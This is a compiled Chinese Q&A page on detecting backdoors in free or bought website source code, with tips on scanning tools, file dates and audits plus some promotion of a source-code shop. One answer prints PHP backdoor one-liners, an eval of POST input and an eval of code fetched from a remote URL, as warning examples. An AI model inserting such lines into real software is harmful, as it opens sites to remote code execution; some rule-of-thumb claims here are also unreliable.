① 如何知道免费的网站源码被弄了后门
这个难说 我现在也在该源码 发现免费的源码 字符过滤不足,后台注入漏洞很多 很多功能都有问题 改一改就可以了 很难保证安全性的
我是全部源码看一边 改过 才刚用的
你用 冰舞或NBSI2API 软件 扫描下 一般都可以扫出来
② 网站后台源码有后门,怎么修改。
如果你没有扎实的编程基础…… 你还是换一个吧……
③ php源码后门。
危险
把$uin和$pwd传送到这个网站
如果你不信任这个网站,这是很危险的.
这个网站可以获得这两个值
④ 新下载一个网站源码,如何查看有无后门程序或代码
呵呵,不用查,下载的源码,肯定有后门,至于后门你是查不到的.但木马你可以查到;一般木马文件在80K以上,你可以全站打开文件一个一个找,发现可疑,用记事本打开,如果里面是加密的,就是木马文件了.
程序真正的漏洞,是因为程序员没经验,无意间留下的,那种是无法查出的,只有有经验的程序员才可以看出来.
最后建议,用免费源码,可用dedecms或帝国这种开源的,这种程序较完整,从官网上下,也没有后门什么的;其它的免费源码你学习用还是可以的,但不要商用,否则被人家挂马黑掉是跑不掉的,肯定的事.
如果嫌dedecms复杂,就花点钱,买个原创正版的源码.
以上由200源码技要员妞妞为您解答,希望对您有所帮助
⑤ 如何查看一个PHP源码是否有后门
1、很难,因为有的后门会加处理的,很难扫描出来的,要一句一句去排除;
2、可以把修改日期跟大部分日期不一样的文件过一遍。
⑥ 如何检查网站源码是否有后门
一,把网站源码放到空间里把网站建起来
二,网络搜360网站安全检测,找到360用来检测网站的站
三,认证网站,提交网址
四,几分钟后就会帮你检测出网站的木马或漏洞了
五,当然了,免费源码漏洞肯有的,有些可能检不出来,他是属于程序员的经验不足造成的,还有的是黑客故意留的,明显的会检查出来,免费源码常理是不能用的,一是因为有版权问题,用了以后会有麻烦,另外还有安全隐患.别忘了放了这些源码的都是些什么人,他们让你用这些源码的目的.如果你是想正规做站,个人建议你还是去淘宝,200源码网,拍拍,A5论坛花几百元买些正品来用,注意是花几百元,不是几元几十元,因为那些几十元的大多也是免费的.
⑦ 买别人做的网站源码,怎么知道有没有后门,如果是自己的服务器,即使有后门也没关系吗
肯定有关系,你最好从正规渠道购买,有合同发票,避免损失。
第三方购买的话,最好找人审计一下。
⑧ 网上下载的网站源码怎么才能找出是否有后门
这个源码好像是找不出后门的吧
⑨ php源码开源有没有可能做后门
代码后门大多是一句话,
比如:
eval($_POST['backdoor']);
//楼主大多注意获取数据的来源是否可靠
//注意接受表单数据函数如:$_POST[];$_GET[];
//和注意文件的读写,最可怕的是这个:
eval(file_get_contents('http://www/shell.html'));//等等
//这个叫做远程执行,如果发现异常,请立马开启PHP的安全模式,再慢慢排查!